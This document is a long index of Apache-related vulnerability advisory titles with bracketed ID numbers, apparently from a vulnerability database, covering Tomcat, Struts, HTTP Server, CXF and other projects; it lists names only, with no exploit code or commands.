| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
| [68229] Apache Harmony PRNG Entropy Weakness
| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
| [64780] Apache CloudStack Unauthorized Access Vulnerability
| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
| [59670] Apache VCL Multiple Input Validation Vulnerabilities
| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
| [54798] Apache Libcloud Man In The Middle Vulnerability
| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
| [54189] Apache Roller Cross Site Request Forgery Vulnerability
| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
| [53880] Apache CXF Child Policies Security Bypass Vulnerability
| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
| [49290] Apache Wicket Cross Site Scripting Vulnerability
| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
| [46953] Apache MPM-ITK Module Security Weakness
| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
| [46166] Apache Tomcat JVM Denial of Service Vulnerability
| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
| [44616] Apache Shiro Directory Traversal Vulnerability
| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
| [42492] Apache CXF XML DTD Processing Security Vulnerability
| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
14620| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
14621| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
14622| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
14623| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
14624| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
14625| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
14626| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
14627| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
14628| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
14629| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
14630| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
14631| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
14632| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
14633| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
14634| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
14635| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
14636| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
14637| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
14638| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
14639| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
14640| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
14641| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
14642| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
14643| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
14644| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
14645| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14646| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
14647| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
14648| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
14649| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
14650| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
14651| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
14652| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
14653| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
14654| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
14655| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
14656| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
14657| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
14658| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
14659| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
14660| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
14661| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
14662| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
14663| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
14664| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
14665| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
14666| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
14667| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
14668| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
14669| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
14670| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
14671| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
14672| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
14673| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
14674| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
14675| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
14676| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
14677| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
14678| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
14679| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
14680| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
14681| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
14682| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
14683| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
14684| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
14685| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
14686| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
14687| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
14688| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
14689| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
14690| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
14691| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
14692| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
14693| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
14694| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
14695| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
14696| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
14697| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
